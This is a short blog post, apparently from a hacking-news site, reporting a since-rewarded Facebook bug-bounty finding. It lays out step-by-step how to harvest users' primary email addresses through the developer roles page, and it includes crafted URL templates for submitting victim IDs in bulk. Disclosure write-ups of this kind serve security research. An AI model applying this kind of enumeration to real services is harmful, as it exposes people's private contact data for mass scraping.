Another Facebook Hack Exposed!!!

Another  Facebook Hack Exposed!!!:-
----------------------------------------------------------------------
 
Today another similar interesting Facebook hack disclosed by another bug hunter, Roy Castillo. On his blog he explained a new facebook hack method that allows anyone to grab primary emails addresses of billions of Facebook users easily.

Facebook Provides a App Dashboard for creating and managing your Facebook apps, with a range of tools to help you configure, build and debug your Facebook apps.

The flaw exists in App settings, where application admin can add developer's profile also, but if the user is not a verified user, a error messages on page will disclose his primary email address.

Using following mentioned steps, one was able to grab email addresses of all facebook users:
  1. Collect profile links of all facebook users from Facebook People Directory i.e http://www.facebook.com/directory/people/
  2. Collect Numerical Facebook ID for each Profile from facebook Graph API i.e http://graph.facebook.com/Satyamevjayte where extracted user ID is 1251386282
  3. Create a Facebook Application -> Go to Settings -> Developer Roles and add try to add a Developer profile, if its a valid ID, application will accept that, otherwise a error message will display the email address of that profile.
  4. To submit profile ID directly from URL parameters : https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID
Where APPLICATION_ID is application ID and VICTIM_UID is numerical id of facebook profiles collected from step 2.

To submit more profiles in bulk:
https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10
and so forth...
This way attacker is able to dump the primary email address of any number of facebook users at once. But was reported to facebook security team by Roy and he is rewarded with $4500 under bug bounty program.
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment